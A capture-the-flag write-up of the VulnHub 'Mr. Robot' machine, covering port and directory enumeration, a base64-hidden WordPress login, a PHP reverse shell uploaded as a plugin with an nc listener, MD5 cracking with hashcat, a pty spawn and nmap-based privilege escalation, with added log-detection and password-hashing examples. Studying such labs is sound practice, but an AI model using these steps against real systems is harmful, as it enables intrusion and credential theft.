“Mr. Robot” VulnHub VM Writeup

Mr. Robot is a Linux-based vulnerable machine available on VulnHub.com. According to the author, the machine has three hidden flags which get progressively harder to find. Mr. Robot is considered beginner/intermediate level, and doesn’t require any advanced exploitation techniques to conquer.

ENUMERATION

The Mr. Robot VM is running on a host-only adapter/network of 192.168.110.0/24. The machine is set up to pull an IP from DHCP when it boots. I know the DHCP range on this subnet is .200-.254, so I start with a simple nmap scan to discover the machine:

nmap -vv 192.168.110.200-254

Results:

Scanning 192.168.110.201 [1000 ports]
Discovered open port 443/tcp on 192.168.110.201
Discovered open port 80/tcp on 192.168.110.201
Completed SYN Stealth Scan at 02:10, 4.97s elapsed (1000 total ports)
Nmap scan report for 192.168.110.201
Host is up, received arp-response (0.00077s latency).
Scanned at 2016-08-30 02:10:30 CDT for 6s
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT    STATE  SERVICE REASON
22/tcp  closed ssh     reset ttl 64
80/tcp  open   http    syn-ack ttl 64
443/tcp open   https   syn-ack ttl 64

Right away, we see the IP address of the machine is 192.168.110.201 and that ports 80 and 443 are open. Navigating to 192.168.110.201 in the browser, we find the interactive Mr. Robot website from the TV show, but nothing of real interest.

Now we’ll run DirBuster to try and enumerate the files/folders on the web-server:

dirb http://192.168.110.201

And get a big list of results to look through:

---- Scanning URL: http://192.168.110.201/
==> DIRECTORY: http://192.168.110.201/0/
==> DIRECTORY: http://192.168.110.201/admin/
+ http://192.168.110.201/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.110.201/audio/
==> DIRECTORY: http://192.168.110.201/blog/
==> DIRECTORY: http://192.168.110.201/css/
+ http://192.168.110.201/dashboard (CODE:302|SIZE:0)
+ http://192.168.110.201/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.110.201/feed/
==> DIRECTORY: http://192.168.110.201/image/
==> DIRECTORY: http://192.168.110.201/Image/
==> DIRECTORY: http://192.168.110.201/images/
+ http://192.168.110.201/index.html (CODE:200|SIZE:1077)
+ http://192.168.110.201/index.php (CODE:301|SIZE:0)
+ http://192.168.110.201/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.110.201/js/
+ http://192.168.110.201/license (CODE:200|SIZE:309)
+ http://192.168.110.201/login (CODE:302|SIZE:0)
+ http://192.168.110.201/page1 (CODE:301|SIZE:0)
+ http://192.168.110.201/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.110.201/rdf (CODE:301|SIZE:0)
+ http://192.168.110.201/readme (CODE:200|SIZE:64)
+ http://192.168.110.201/robots (CODE:200|SIZE:41)
+ http://192.168.110.201/robots.txt (CODE:200|SIZE:41)
+ http://192.168.110.201/rss (CODE:301|SIZE:0)
+ http://192.168.110.201/rss2 (CODE:301|SIZE:0)
+ http://192.168.110.201/sitemap (CODE:200|SIZE:0)
+ http://192.168.110.201/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.110.201/video/
==> DIRECTORY: http://192.168.110.201/wp-admin/
+ http://192.168.110.201/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.110.201/wp-content/
+ http://192.168.110.201/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.110.201/wp-includes/
+ http://192.168.110.201/wp-links-opml (CODE:200|SIZE:227)
+ http://192.168.110.201/wp-load (CODE:200|SIZE:0)
+ http://192.168.110.201/wp-login (CODE:200|SIZE:2685)
+ http://192.168.110.201/wp-mail (CODE:500|SIZE:3064)
+ http://192.168.110.201/wp-settings (CODE:500|SIZE:0)
+ http://192.168.110.201/wp-signup (CODE:302|SIZE:0)
+ http://192.168.110.201/xmlrpc (CODE:405|SIZE:42)
+ http://192.168.110.201/xmlrpc.php (CODE:405|SIZE:42)

We see that WordPress is installed. But before messing with that, it’s crucial that we go through every other file/folder and look for useful information. The first interesting file we find is 192.168.110.201/license. NOTE: At first glance, this page just has one line of text taunting us. Make sure you look at the ENTIRE THING!

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?

~~snip~~

do you want a password or something?

~~snip~~

ZWxsaW90OkVSMjgtMDY1Mgo=

At the very bottom of the file/page, we find what looks to be a base-64 encoded string. Let’s try decoding it in the terminal:

echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d
elliot:ER28-0652

Looks like we’ve found some credentials. Maybe they’re for WordPress? We’ll save these and finish up with our enumeration and looting of the web-server’s files and folders.

FIRST FLAG FOUND

After continuing to look through the files and directories found by DirBuster, we make our way into the robots.txt file. In there, we find two very interesting files:

User-agent: *
fsocity.dic
key-1-of-3.txt

The fsocity.dic file appears to be a wordlist that we’ll hang on to just in case we need it later. When we navigate to http://192.168.110.201/key-1-of-3.txt, we find the first of three flags:

073403c8a58a1f80d943455fb30724b9

WORDPRESS & GETTING A SHELL

With the first flag captured and the enumeration/looting of the webserver’s public files/directories complete, it’s time to take a look at the WordPress install. Using the elliot:ER28-0652 credentials we found earlier, we’re able to log into WordPress. It becomes immediately apparent that elliot is the administrator account:

[Screenshot: WordPress dashboard logged in as elliot - Mr. Robot Vulnerable Machine - VulnHub]

Now that we have access to the WordPress administrator account, we should be able to set up a reverse shell back to a listener on our attack machine. I used a PHP reverse shell from PentestMonkey and uploaded it to the server through WordPress’ built-in plugin installer. However, in hindsight, I also could have used WordPress’ built-in file editor to insert some malicious PHP into one of the many WordPress .php files.

Before executing the code on the server, let’s first set up a listener on our attack machine:

nc -lvp 666

Note: Make sure you set this to whatever port your shell is trying to connect back to. I used 666 in this example.

With a listener running, we can now use the browser to navigate to the location of our uploaded shell (http://192.168.110.201/wp-content/uploads/2016/08/shell.php) and hopefully get a shell on our attack machine:

[Screenshot: PHP reverse shell connecting back from the Mr. Robot Vulnerable Machine]
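As an added defensive example (not part of the original writeup): the shell above is triggered by requesting a .php file under wp-content/uploads, a tree that should only ever serve static media. The snippet below parses constructed Apache-style access-log lines and flags any request for a script file in that tree; the log lines, timestamps and client IPs are made up for illustration.

```python
import re
from pathlib import PurePosixPath

# Constructed sample "combined" access-log lines (not from the original
# writeup). The fourth line mirrors the upload path the writeup browses to.
SAMPLE_LOG = """\
192.168.110.5 - - [30/Aug/2016:02:15:01 -0500] "GET /wp-login.php HTTP/1.1" 200 2685 "-" "Mozilla/5.0"
192.168.110.5 - - [30/Aug/2016:02:15:09 -0500] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.110.5 - - [30/Aug/2016:02:16:40 -0500] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.110.5 - - [30/Aug/2016:02:17:02 -0500] "GET /wp-content/uploads/2016/08/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.110.7 - - [30/Aug/2016:02:17:30 -0500] "GET /wp-content/uploads/2016/08/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
"""

# client ip, timestamp, method, request path and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Script extensions that should never be served from the uploads tree.
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".phar"}


def is_script_in_uploads(path: str) -> bool:
    """True if the request targets a script file under wp-content/uploads."""
    clean = path.split("?", 1)[0]          # drop any query string
    return "/wp-content/uploads/" in clean and PurePosixPath(clean).suffix.lower() in SCRIPT_EXTS


def find_upload_execution(log_text: str):
    """Return (ip, timestamp, path, status) for every request that executes a
    script out of the uploads directory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_script_in_uploads(m["path"]):
            hits.append((m["ip"], m["ts"], m["path"].split("?", 1)[0], int(m["status"])))
    return hits


if __name__ == "__main__":
    for hit in find_upload_execution(SAMPLE_LOG):
        print("ALERT script executed from uploads:", hit)
```

Pair the alert with a web-server rule that refuses to execute PHP under wp-content/uploads, and keep an eye on plugin-installer activity, which is rare on a production site.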

With a shell established, let’s begin looking around. I tend to start in the home directory and in this instance we find a folder for a user named “robot”. Let’s cd into that folder and take a look if we can:

$ cd /home/robot/
$ ls -asl
total 16
4 drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
4 drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
4 -r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
4 -rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5

We find the second key file, but we can’t read it: it is readable only by its owner, robot, and our shell is running as daemon. However, there is a file named password.raw-md5 that we can read:

$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

It looks to be the login and password hash for the user “robot”. Let’s place that hash in a text file on our attacker machine named hashes, and then use hashcat and the rockyou.txt wordlist to try and crack it:

hashcat -a 0 -m 0 hashes rockyou.txt
Initializing hashcat v2.00 with 2 threads and 32mb segment-size...

Added hashes from file hashes: 1 (1 salts)
Activating quick-digest mode for single-hash

c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz
                                             
All hashes have been recovered

Input.Mode: Dict (rockyou.txt)
Index.....: 1/5 (segment), 3627099 (words), 33550343 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 2.77M words
Progress..: 1853946/3627099 (51.11%)
Running...: 00:00:00:01
Estimated.: --:--:--:--

So the password for user “robot” is abcdefghijklmnopqrstuvwxyz.
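An added example, not from the original writeup, showing why the crack above was instant: password.raw-md5 stores an unsalted MD5, so one digest per wordlist entry is enough to test it. The block reproduces the page’s hash from the recovered password against a constructed four-word list, then shows the hardened alternative (per-user random salt plus PBKDF2-HMAC-SHA256 with a high iteration count and a constant-time compare). The iteration count and the mini wordlist are my choices.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional, Tuple

# Values from the writeup: the raw (unsalted) MD5 read from password.raw-md5
# and the password hashcat recovered for it.
ROBOT_HASH = "c3fcd3d76192e4007dfb496cca67e13b"
ROBOT_PASSWORD = "abcdefghijklmnopqrstuvwxyz"

# Constructed mini wordlist standing in for rockyou.txt (illustration only).
WORDLIST = ["password", "letmein", "qwerty", "abcdefghijklmnopqrstuvwxyz"]


def raw_md5(password: str) -> str:
    """Unsalted MD5 as stored on the VM: no salt, no work factor."""
    return hashlib.md5(password.encode()).hexdigest()


def audit_weak_md5(stored_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the wordlist entry that reproduces stored_hash, or None.
    One digest per candidate is all it takes, which is why hashcat over
    rockyou finished in about a second."""
    for word in wordlist:
        if hmac.compare_digest(raw_md5(word), stored_hash):
            return word
    return None


# Hardened storage: random per-user salt plus a slow KDF. The round count is
# my choice for this example; tune it to your hardware.
PBKDF2_ROUNDS = 600_000


def make_pbkdf2(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Derive a salted PBKDF2-HMAC-SHA256 digest; returns (salt, digest)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_pbkdf2(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print("weak md5 recovered as:", audit_weak_md5(ROBOT_HASH, WORDLIST))
    salt, digest = make_pbkdf2(ROBOT_PASSWORD)
    print("pbkdf2 verify:", verify_pbkdf2(ROBOT_PASSWORD, salt, digest))
```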

GETTING FLAG #2

When attempting to login as “robot” by using ‘su - robot’, I kept getting an error saying I could only execute this command from a terminal. I managed to get around this by borrowing the following command from g0tmi1k’s Basic Linux Privilege Escalation page:

python -c 'import pty;pty.spawn("/bin/bash")'

Which then allowed me to login as robot:

daemon@linux:/$ su - robot
Password: abcdefghijklmnopqrstuvwxyz

$ whoami
robot

Now that we’re logged in as robot, we can finally read the second flag file:

$ cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959

GETTING ROOT & FLAG #3

Escalating privileges to root on Mr. Robot was definitely challenging for me. After doing all sorts of enumeration and searching for exploits on exploit-db/etc, I was stuck. I finally asked a friend who had recently completed Mr. Robot for help. He told me that nmap was installed on the VM, and that I should look into that. After some Google searching, I learned that nmap’s interactive mode could be used to escalate privileges in certain scenarios.

From there, it was smooth sailing and I managed to quickly get root privileges and read the third and final flag file:

[Screenshot: Getting root on the Mr. Robot Vulnerable Machine]

CONCLUSION

This was a fun machine overall and taught me a few things:

First: How easily an Admin account on WordPress can be leveraged to get a shell on a server.

Second: How important enumeration is to privilege escalation. Even though I thought I had looked at everything, I had missed a relatively simple escalation vulnerability.

Enumerate, enumerate, enumerate… and then Google everything you find.

Contact: e-mail, or Twitter @Hack312